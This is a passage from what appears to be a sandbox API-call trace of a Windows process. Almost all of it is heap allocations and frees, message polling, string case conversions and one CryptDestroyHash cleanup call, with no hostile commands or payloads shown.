hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0160.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0160.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0160.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0160.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa640 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0160.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.716] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.716] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.717] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.717] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.717] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0160.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.720] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.720] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0160.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0160.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 